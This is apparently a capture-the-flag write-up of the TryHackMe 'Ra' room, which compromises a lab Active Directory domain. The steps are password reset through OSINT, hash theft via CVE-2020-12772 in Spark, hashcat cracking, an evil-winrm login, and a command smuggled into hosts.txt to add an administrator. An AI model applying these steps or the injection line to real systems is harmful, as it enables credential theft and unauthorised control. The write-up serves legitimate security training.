TryHackMe | Ra
Ra is a hard-rated TryHackMe room set inside a simulated corporate Windows Active Directory environment. The challenge tasks you with compromising WindCorp's internal network, working from an external foothold all the way through to Domain Controller access. It covers OSINT-based password reset, exploiting a vulnerable XMPP client to steal NTLM hashes, cracking those hashes with hashcat, and a creative privilege escalation using a scheduled script that reads an attacker-controlled file. I found this room a lot of fun. I think it does a good job of chaining together techniques you'd use in a real Active Directory engagement.
Reconnaissance
Port Scanning
The nmap scan reveals a full Windows domain controller environment:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm)
445/tcp open microsoft-ds
464/tcp open kpasswd5
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3389/tcp open ms-wbt-server Microsoft Terminal Services
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
7070/tcp open http Jetty 9.4.18.v20190429 (Openfire HTTP Binding)
9090/tcp open zeus-adminThe domain is windcorp.thm, the machine is named FIRE. A few things immediately stand out: we have a full AD setup (DNS, Kerberos, LDAP, SMB) and an Openfire XMPP Jabber server running on port 5222. The Spark XMPP client is commonly used with Openfire and actually becomes our key to an initial foothold.
Password Reset
The WindCorp website on port 80 includes an employee directory with photos. One profile belongs to a user called Lily, and the password reset page for the domain asks a security question about the name of her pet.
A quick look at the employee photo on the website reveals her pet's name. I won't spell it out here, but it's visible in the image. Using that answer, I reset Lily's account (lilyle) to a new password.
SMB Enumeration
With lilyle credentials in hand, I used smbclient to enumerate shares:
Disk Permissions
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
Shared READ ONLY
SYSVOL READ ONLY
Users READ ONLYThe Shared share is accessible. Inside it I found Flag 1 and more importantly, installers for Spark version 2.8.3 for Windows, Mac, and Linux.
smb: \> ls
Flag 1.txt A 45 Fri May 1 17:32:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 02:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 13:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 13:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 13:07:24 2020The fact that the company is distributing a specific version of Spark is a hint. Spark 2.8.3 is vulnerable to CVE-2020-12772.
Exploiting CVE-2020-12772
NTLM Hash Capture
CVE-2020-12772 is a vulnerability in the Spark XMPP client where sending a message containing an img tag pointing to an attacker-controlled server causes the recipient's client to automatically make an HTTP request (including their NTLM credentials) to that server.
The attack is simple:
- Install Spark 2.8.3 and log in with the lilyle credentials.
- Start Responder on my attacking machine to capture NTLM authentication attempts.
- Find the only online user in the XMPP roster (in this case, Buse Candan) and send them a message containing an img tag with my tun0 IP address.
Responder catches the callback almost immediately:
[HTTP] NTLMv2 Client : 10.10.216.105
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:adbbb4ecad851d7a:F0CA3B187AF814F12A5...Cracking the Hash
With the NTLMv2 hash captured, I passed it to hashcat using mode 5600 (NetNTLMv2) against rockyou.txt:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txtThe hash cracks quickly, giving us Buse's password: uzunLM+3131
Foothold via Evil-WinRM
With Buse's credentials I can connect over WinRM, which is enabled on this machine:
evil-winrm -u buse -p 'uzunLM+3131' -i windcorp.thmFlag 2 is on Buse's desktop. More interestingly, there's a Notes.txt file revealing that a hosts.txt file belonging to another user (brittanycr) is periodically executed as part of a PowerShell script that runs with administrator privileges. The contents of hosts.txt are appended to a command that gets executed. This looks promising.
Privilege Escalation
Buse has the ability to create new users and change other users' passwords. I changed brittanycr's password and logged in to her SMB share to overwrite hosts.txt with:
google.com; net localgroup Administrators gareth /addWhen the scheduled PowerShell script next runs as admin, it processes hosts.txt and my injected command runs, adding my user to the local Administrators group. After waiting a moment, I reconnected via Evil-WinRM as my newly-elevated account and grabbed the final flag:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Flag3.txtTHM{ba3a...aef}Summary
Ra is a well-constructed room that chains together several techniques you'd actually use against a real Windows domain:
- OSINT to answer a security question and gain an initial set of credentials
- SMB enumeration to discover both loot and the clue about which software is deployed
- CVE-2020-12772 - a client-side vulnerability in Spark that leaks NTLM hashes when a crafted message is received
- NTLMv2 hash cracking with hashcat
- Evil-WinRM for lateral movement once valid credentials are in hand
- Script injection via an attacker-controlled file that a privileged process reads
The privilege escalation step in particular felt realistic. A scheduled task reading from a file the wrong user has write access to is exactly the kind of misconfiguration you might find in real environments.
Overall I think this was a really good room.